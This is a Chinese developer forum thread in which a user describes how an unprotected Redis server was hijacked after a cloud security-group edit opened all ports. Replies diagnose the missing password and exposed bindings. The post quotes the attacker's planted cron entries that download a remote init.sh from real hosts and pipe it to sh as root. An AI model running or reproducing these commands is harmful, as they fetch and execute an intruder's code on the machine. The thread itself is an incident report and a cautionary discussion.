这是一个创建于 1383 天前的主题,其中的信息可能已经有所发展或是发生改变。
事情是这样, 刚才发现我的一个服务挂了,仔细检查发现是 redis 问题,
我勒个去,我所有的 key 都没了,只剩下 backup1 - backup12 这十二个 key,内容略有不同,大致是下边这样
\n\n\n*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | sh\n\n
\n\n\n*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | sh\n\n
怎么会这样,平时只开必要的端口,6379 是绝对不开的
时间回到 1 个小时前,我新跑了一个服务,需要打开 tcp 端口 12345,我拿出手机,打开阿里云,操作安全组,开端口,一气呵成。
咦?怎么不行?原来程序需要的是 tcp 端口,我设置成了 udp 。找到新增的一条规则,把 udp 改成 tcp,确定,O 了,搞定
经过就是这样,看出问题了吗?以上过程均可复现
被入侵,我想过很多种可能,却没想到这一种
到现在我也没找到阿里云的安全组操作日志在哪里
我勒个去,我所有的 key 都没了,只剩下 backup1 - backup12 这十二个 key,内容略有不同,大致是下边这样
\n\n\n*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | sh\n\n
\n\n\n*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | sh\n\n
怎么会这样,平时只开必要的端口,6379 是绝对不开的
时间回到 1 个小时前,我新跑了一个服务,需要打开 tcp 端口 12345,我拿出手机,打开阿里云,操作安全组,开端口,一气呵成。
咦?怎么不行?原来程序需要的是 tcp 端口,我设置成了 udp 。找到新增的一条规则,把 udp 改成 tcp,确定,O 了,搞定
经过就是这样,看出问题了吗?以上过程均可复现
被入侵,我想过很多种可能,却没想到这一种
到现在我也没找到阿里云的安全组操作日志在哪里
 |
1
wunonglin 2021-02-01 20:06:58 +08:00
你是说 udp 换成 tcp 的时候端口范围会变成 1/65535,然后没注意看然后就保存了是不?
另外你 redis 干嘛 bind0.0.0.0 啊? |
 |
3
keepeye 2021-02-01 20:22:52 +08:00  2
不管做什么操作,要核对一遍再提交
|
 |
4
towser 2021-02-01 20:26:25 +08:00
也没启用密码吧。现在扫 redis 的多如牛毛,我测试服务器放公网半小时就被入侵了。
|
 |
5
YouLMAO 2021-02-01 20:39:39 +08:00
没注意看
|
|
6
YouLMAO 2021-02-01 20:40:48 +08:00
如果我是蚂蚁金服 ceo, 直接开除你和你全组, 线上服务器还能单人操作的不经 review 流程的
|
 |
7
illl 2021-02-01 20:43:00 +08:00 via iPhone
这个不应该是自己没设密码导致的呗
|
 |
8
boris93 2021-02-01 21:50:25 +08:00 via Android 5
|
 |
9
swulling 2021-02-01 21:54:59 +08:00 via iPhone
不能因为内网就不设置密码。
|
 |
10
matrix67 2021-02-01 22:04:44 +08:00 1
赶紧重装机器,不单单只是 redis 被黑了
说不定还会横向移动攻击数据库之类的,再加上现在还有 sudo 提权漏洞 错就错在 "一气呵成" 啊 |
 |
11
PerFectTime 2021-02-01 22:05:52 +08:00 1
docker 发布端口的时候得加上 127.0.0.1
防火墙规则对 docker 端口无效 |
 |
12
lerry OP |
 |
13
mytsing520 2021-02-01 23:31:00 +08:00
虽然有马后炮的嫌疑,但我是从不信任任何在手机端对生产环境进行的操作,即便是我自己或信任的人进行的操作,毕竟鬼知道会发生什么问题。
|
 |
14
lxiszuhi 2021-02-01 23:38:18 +08:00
linux 这么容易黑的吗?
|
|
16
PerFectTime 2021-02-01 23:57:36 +08:00
@lerry #12 ps: 防火墙规则对 docker 无效指的是 iptables
|
 |
17
learningman 2021-02-02 00:05:26 +08:00
@PerFectTime 对,这玩意儿最容易反应不过来,docker 默认 bind 0.0.0.0,然后还会自动加 iptables 规则
|
 |
18
min 2021-02-02 02:03:39 +08:00 1
你的 redis 不设密码导致你的服务器被入侵
|
 |
19
yzbythesea 2021-02-02 03:26:13 +08:00
安全组设成 0.0.0.0/10,真是心大啊。
|
 |
20
d5 2021-02-02 08:48:01 +08:00 via iPhone
赞同 18 楼的说法
|
 |
21
saytesnake 2021-02-02 08:55:37 +08:00
@learningman
阿里云上我反而不担心这问题,有安全组配置,不过我没用过 APP,手机上弄这个不太好感觉。 目前非一堆微服务的单体应用已经慢慢转成 Podman 了,非 root 启动搭配上 systemd 很舒适。 |
 |
22
tankren 2021-02-02 10:38:58 +08:00
redis 开放是根本原因 不过你可以提交“bug”给 APP 组啊
|
 |
23
lopetver 2021-02-02 10:49:00 +08:00
|
|
24
lopetver 2021-02-02 11:07:08 +08:00
|
|
25
lerry OP |
 |
26
cnleon 2021-02-02 14:16:58 +08:00
自己开放 1-65535,这还能怪别人?
|
|
28
lerry OP @lozt #25 是的,本来设置的 udp 12345,把 udp 改成 tcp,端口自己变成 1-65535 了,你不觉得这 App 的行为有问题吗
|
 |
30
markgor 2021-02-05 14:06:38 +08:00
搞运维要形成 double check 的习惯,
就算是平常操作,配置完后还是要检查一遍才放心。 但如果说的是 app 体验度,我觉得端口这给位置,default 应该是空的,提示是 1-65535,且必填。 |
 |
31
someonedeng 2021-03-24 10:31:45 +08:00
主要还是没密码
|
Select Language